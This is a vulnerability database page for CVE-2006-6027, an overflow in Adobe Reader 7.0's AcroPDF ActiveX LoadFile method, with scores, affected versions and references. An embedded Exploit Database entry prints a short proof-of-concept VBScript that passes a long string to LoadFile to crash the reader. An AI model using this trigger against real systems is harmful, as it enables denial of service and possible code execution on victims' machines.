CVE-2006-6027 : Detail

CVE-2006-6027

68.41%V3
Network
2006-11-21
22h00 +00:00
2018-10-17
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Adobe Reader (Adobe Acrobat Reader) 7.0 through 7.0.8 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long argument string to the LoadFile method in an AcroPDF ActiveX control.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 29076

Publication date : 2006-11-16 23h00 +00:00
Author : Michal Bucko
EDB Verified : Yes

source: https://www.securityfocus.com/bid/21155/info Adobe Acrobat is prone to multiple vulnerabilities. These errors have been confirmed to occur when Reader is invoked by Internet Explorer; other occurrences may exist. Attackers can exploit these issues to cause denial-of-service conditions on a victim computer. The vendor has confirmed that one of these issues may lead to arbitrary code execution. <?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroPDF.dll" prototype = "Function LoadFile ( ByVal fileName As String ) As Boolean" memberName = "LoadFile" progid = "AcroPDFLib.AcroPDF" argCount = 1 arg1=String(6164, "A") target.LoadFile arg1 </script></job></package>

Products Mentioned

Configuraton 0

Adobe>>Acrobat_reader >> Version 7.0

Adobe>>Acrobat_reader >> Version 7.0.1

Adobe>>Acrobat_reader >> Version 7.0.2

Adobe>>Acrobat_reader >> Version 7.0.3

Adobe>>Acrobat_reader >> Version 7.0.4

Adobe>>Acrobat_reader >> Version 7.0.5

Adobe>>Acrobat_reader >> Version 7.0.6

Adobe>>Acrobat_reader >> Version 7.0.7

Adobe>>Acrobat_reader >> Version 7.0.8

References

http://www.vupen.com/english/advisories/2006/4751
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/23138
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.kb.cert.org/vuls/id/198908
Tags : third-party-advisory, x_refsource_CERT-VN
http://securitytracker.com/id?1017297
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/21155
Tags : vdb-entry, x_refsource_BID